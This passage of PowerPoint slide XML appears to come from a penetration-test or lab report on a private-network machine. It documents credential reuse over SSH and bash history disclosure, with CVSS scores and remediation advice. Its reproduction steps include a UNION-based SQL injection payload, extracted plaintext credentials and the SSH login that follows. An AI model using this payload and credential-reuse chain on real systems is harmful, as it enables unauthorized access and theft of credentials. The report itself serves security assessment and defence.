              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Persistence:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Established foothold for backdoors, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Data Breach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Access to sensitive files and configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Credential Segmentation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Never reuse credentials across services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Multi-Factor Authentication:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Implement SSH key + password or OTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Network Controls: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Restrict SSH to VPN/IP whitelist Implement fail2ban for brute-force protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Credential Rotation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Enforce quarterly password changes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1810185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2C563-1301-20A7-D0A5-C8C32B85E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400B0-F1FC-133F-3E2C-A84FFA28C143}"/>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BCE60EE3-3018-163E-C136-CFAE2C9B70CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="884584"/>
            <a:ext cx="7494105" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.8 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Vector: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Extracted credentials from previous SQL Injection: Username:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>jehad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>fool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Logged in via SSH: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>jehad@192.168.139.143</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection exploited on id parameter of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retrieved credentials (user, pass) from ssh table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reused the credentials for SSH login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Successfully authenticated into the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conducted post-exploitation (e.g., SSH tunneling, remote command execution, reverse shell).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95419A00-F6B5-688B-9438-FAE6CF182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2935" y="1613894"/>
            <a:ext cx="4492245" cy="3057497"/>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186313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1FA00-6CEC-38D4-A9FF-6BB0508BF8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8C571-541C-38A1-A554-7574A3CA1DCC}"/>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6F66D76C-8BBB-500C-C304-DC2137CF5A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7007086" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit SQL injection vulnerability to retrieve: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note the username and password (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>jehad / fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attempt SSH login: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access granted without further checks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Verify access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>      #/home/jehad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gained unauthorized SSH access using reused credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obtained full user-level shell on the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Created a reverse shell through exposed local web service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabled lateral movement across the internal network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performed privilege escalation to gain root access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accessed and modified sensitive system files and commands, compromising system integrity and confidentiality.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F469B3-BD57-A21B-B230-95729A35AA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7140102" y="1185144"/>
            <a:ext cx="4607949" cy="2952037"/>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2044319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921B0-9D60-F6D1-0A0D-89A863E1F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584B23-BEE5-68C8-1062-7DF68AACA5E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Bash History Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D3BE95-9ED4-F42B-8D34-0181B39867D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Sensitive Data Exposure via Bash History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The target system exposed sensitive user information through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>file. After gaining SSH access, Able to read the bash history of the user jehad, which included clear-text passwords, internal commands, and URLs — revealing sensitive operational details that could aid further exploitation or privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine &amp; Paths </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(Accessed via SSH: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>jehad@192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) Vulnerable File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/home/jehad/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>because access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>file revealed cleartext credentials and sensitive commands, enabling further system compromise. The attack required local user access but had a high impact on confidentiality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Credential Theft: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t> user password (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>gang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Attack Surface Expansion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Revealed internal services (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>9999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Privilege Escalation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t> patterns and misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Set proper permissions on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>.bash history </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>files (readable only by owner) and Regularly clear or disable bash history for sensitive users or sessions. Avoid typing passwords or sensitive data in the shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Implement monitoring for unauthorized access to user history files. Credential Handling- Use SSH keys instead of passwords and Implement secret management tools (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>Vault, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>Keywhiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79201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AF32D-FFC9-4E1C-D86C-32A69638F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67285-2D20-4B11-B423-589ED69F257A}"/>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DDF591B0-FE68-7DBC-0FD9-C5FE82C3017F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>7.8 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://wafatech.sa/blog/linux/linux-security/best-practices-for-securing-command-history-files-on-linux-servers/#:~:text=By%20default%2C%20Linux%20systems%20maintain,risk%20if%20not%20managed%20properly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
